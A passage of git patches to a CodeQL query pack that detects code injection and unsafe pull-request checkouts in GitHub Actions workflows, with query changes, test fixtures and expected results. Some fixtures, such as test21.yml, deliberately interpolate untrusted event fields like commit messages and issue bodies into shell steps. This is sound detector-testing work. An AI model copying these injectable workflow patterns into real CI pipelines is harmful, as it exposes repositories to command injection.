Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From fe9c9088809ee4857fe9ef36d99ce7e4becdc554 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 14:18:20 +0200 Subject: [PATCH 634/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a818ba5362aa..a8fab7861815 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.76 +version: 0.1.77 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe6bdb0d77e9..f5924ff430c4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.76 +version: 0.1.77 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6136a987643087be93aeaa1b29069f688b9a416a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:54:04 +0100 Subject: [PATCH 635/707] Add getEvent to RemoteFlowSource for events able to trigger the source --- .../codeql/actions/dataflow/FlowSources.qll | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7dfdc42b05e2..fa964f475cf7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -18,39 +18,47 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + /** Gets the event that triggered the source. */ + abstract Event getEvent(); + override string getThreatModel() { result = "remote" } } class GitHubCtxSource extends RemoteFlowSource { string flag; + Event event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; + Event event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getATriggerEvent() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or @@ -65,12 +73,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } string getContext() { result = context } + + override Event getEvent() { result = event } } abstract class CommandSource extends RemoteFlowSource { abstract string getCommand(); abstract Run getEnclosingRun(); + + override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -181,18 +193,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; + Event event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -206,6 +219,8 @@ class GitHubEventJsonSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } /** @@ -217,6 +232,8 @@ class MaDSource extends RemoteFlowSource { MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } abstract class FileSource extends RemoteFlowSource { } @@ -228,12 +245,16 @@ class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { + Event event; + CheckoutSource() { // This should be: // source instanceof PRHeadCheckoutStep @@ -245,7 +266,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() + event = uses.getATriggerEvent() and + event.getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout @@ -258,6 +280,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = event } } /** @@ -273,6 +297,8 @@ class DornyPathsFilterSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -294,6 +320,8 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -315,6 +343,8 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { @@ -327,6 +357,8 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -348,4 +380,6 @@ class OctokitRequestActionSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } From e34835f71a8fd247afc4ea95d5f8d55785bf6cbb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:23 +0100 Subject: [PATCH 636/707] fix: AstNode.getATriggerEvent() getATriggerEvent did not work for nodes outside a Job. If there is no enclosing job, get the trigger from the enclosing workflow --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ce6db22636cc..5f33400bb962 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -114,7 +114,11 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets and Event triggering this node. */ - EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingJob().getATriggerEvent() + or + not exists(this.getEnclosingJob()) and result = this.getEnclosingWorkflow().getATriggerEvent() + } /** * Gets the enclosing Step. From 62d9302e8ba4de3a8c4558451f8f4e7d88aedc20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:44 +0100 Subject: [PATCH 637/707] chore: remove leftover commented out code --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 7 ------- 1 file changed, 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ffbb6fac2637..9653ae2beda1 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,6 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -209,7 +208,6 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink @@ -242,7 +240,6 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and @@ -273,7 +270,6 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -297,7 +293,6 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -318,7 +313,6 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -341,7 +335,6 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) From 792e8555af5b5a6628ee1ab956b81ffdaafe3a96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:56:59 +0100 Subject: [PATCH 638/707] fix: remove context 2 events mappings client_paylaod (dispatch), commits (push), head_commit (push) and merge_group are not under external attacker control so remove them --- ql/lib/ext/config/context_event_map.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 35ccafc5beed..4d28fa778e0f 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -40,14 +40,10 @@ extensions: - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] - - ["workflow_call", "github.event.commits"] - ["workflow_call", "github.event.discussion"] - - ["workflow_call", "github.event.head_commit"] - ["workflow_call", "github.event.inputs"] - ["workflow_call", "github.event.issue"] - - ["workflow_call", "github.event.merge_group"] - ["workflow_call", "github.event.pages"] - ["workflow_call", "github.event.pull_request"] - ["workflow_call", "github.event.review"] From 18137f58c299182fbbc1033e323d77c1a072e277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:14 +0100 Subject: [PATCH 639/707] fix: take trigger events into consideration Code Injection remote flow sources should be triggerable by the privileged event --- .../Security/CWE-094/CodeInjectionCritical.ql | 6 +- .../.github/actions/action5/action.yml | 4 +- .../CWE-094/.github/workflows/test21.yml | 24 ++ .../CWE-094/CodeInjectionCritical.expected | 312 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 13 +- 5 files changed, 193 insertions(+), 166 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ef66ac229f2d..a197c5779483 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -23,6 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and + source.getNode().(RemoteFlowSource).getEvent() = event and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | @@ -31,5 +32,6 @@ where exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential code injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index a03c27be226b..53a2e0c87e27 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.issue.body }}' - name: Step id: step env: @@ -25,7 +25,7 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.pull_request.body }} + FOO2: ${{ github.event.issue.body }} shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml new file mode 100644 index 000000000000..03ecc20de86a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -0,0 +1,24 @@ +on: + push: + branches: + - main + - 'release/v*' + workflow_dispatch: + inputs: + version: + required: true + description: 'Release' + type: string + +jobs: + release-tag: + runs-on: ubuntu-latest + if: ${{ startsWith(github.event.head_commit.message, 'release:') }} + steps: + - name: Extract version and PR number from commit message + id: extract_info + shell: bash + run: | + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index dd9836805bd8..4a2950d84ae9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | @@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -612,153 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | 